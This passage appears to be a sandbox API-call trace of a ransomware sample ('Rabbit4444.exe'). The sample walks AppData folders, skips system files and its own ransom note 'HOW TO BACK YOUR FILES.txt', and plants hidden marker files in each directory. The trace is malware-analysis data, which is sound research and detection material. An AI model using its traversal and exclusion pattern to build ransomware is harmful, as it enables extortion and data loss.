(lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0066.334] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0066.334] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0066.334] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0066.334] lstrcpyW (in: lpString1=0x130ebee, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0066.334] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0066.334] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0066.334] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xce) returned 0x108760 [0066.334] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x122368 [0066.334] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x825856ce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0d93da9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x825856ce, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0066.334] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.334] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.334] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0066.334] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0066.334] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0066.334] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0066.334] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0066.334] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0066.334] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0066.334] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0066.335] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0066.335] lstrcpyW (in: lpString1=0x130ebee, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0066.335] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122200 [0066.335] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc0) returned 0xefb28 [0066.335] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122208 | out: ListHead=0xf68b0, ListEntry=0x122208) returned 0x122308 [0066.335] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x825856ce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0d93da9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x825856ce, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0066.335] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0066.335] lstrcpyW (in: lpString1=0x130ebee, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.335] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.335] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.335] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.336] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.336] CloseHandle (hObject=0x27c) returned 1 [0066.336] CloseHandle (hObject=0x228) returned 1 [0066.336] GetCurrentThreadId () returned 0xd98 [0066.336] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122208 [0066.336] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp" [0066.336] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xefb28 | out: hHeap=0xe0000) returned 1 [0066.336] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122200 | out: hHeap=0xe0000) returned 1 [0066.336] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp" [0066.336] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp\\" [0066.336] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0066.336] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.337] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.340] FlushFileBuffers (hFile=0x228) returned 1 [0066.341] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.341] CloseHandle (hObject=0x228) returned 1 [0066.342] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp") returned 95 [0066.342] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.342] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x825856ce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0d93da9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0dbeb56, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0066.342] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.342] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.342] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.342] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.342] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x825856ce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0d93da9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0dbeb56, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.342] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.342] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.342] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.342] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.342] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.342] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0dbeb56, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0dbeb56, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0de4c4f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.342] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.342] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.342] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0dbeb56, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0dbeb56, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0de4c4f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.342] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0066.342] lstrcpyW (in: lpString1=0x130ebf8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.342] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.343] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.343] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.343] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.343] CloseHandle (hObject=0x27c) returned 1 [0066.344] CloseHandle (hObject=0x228) returned 1 [0066.344] GetCurrentThreadId () returned 0xd98 [0066.344] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0066.344] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory" [0066.344] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108760 | out: hHeap=0xe0000) returned 1 [0066.344] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0066.344] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory" [0066.344] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory\\" [0066.344] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0066.344] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.345] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.348] FlushFileBuffers (hFile=0x228) returned 1 [0066.349] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.349] CloseHandle (hObject=0x228) returned 1 [0066.349] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory") returned 102 [0066.349] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.350] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x825856ce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0d9368b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0de4c4f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0066.350] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.350] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.350] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.350] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.350] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x825856ce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0d9368b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0de4c4f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.350] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.350] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.350] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.350] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.350] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.350] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0de4c4f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0de4c4f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0de4c4f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.350] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.350] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.350] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0de4c4f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0de4c4f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0de4c4f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.350] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0066.350] lstrcpyW (in: lpString1=0x130ec06, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.350] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.351] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.351] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.351] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.351] CloseHandle (hObject=0x27c) returned 1 [0066.351] CloseHandle (hObject=0x228) returned 1 [0066.351] GetCurrentThreadId () returned 0xd98 [0066.351] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122368 [0066.351] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies" [0066.351] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108688 | out: hHeap=0xe0000) returned 1 [0066.351] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122360 | out: hHeap=0xe0000) returned 1 [0066.351] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies" [0066.351] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies\\" [0066.351] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0066.351] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.352] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.355] FlushFileBuffers (hFile=0x228) returned 1 [0066.356] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.356] CloseHandle (hObject=0x228) returned 1 [0066.356] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies") returned 102 [0066.356] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.356] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x825856ce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0d92f43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0de4c4f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0066.357] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.357] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.357] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.357] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.357] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x825856ce, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd0d92f43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0de4c4f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.357] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.357] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.357] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.357] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.357] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.357] FindNextFileW (in: hFindFile=0x102410, 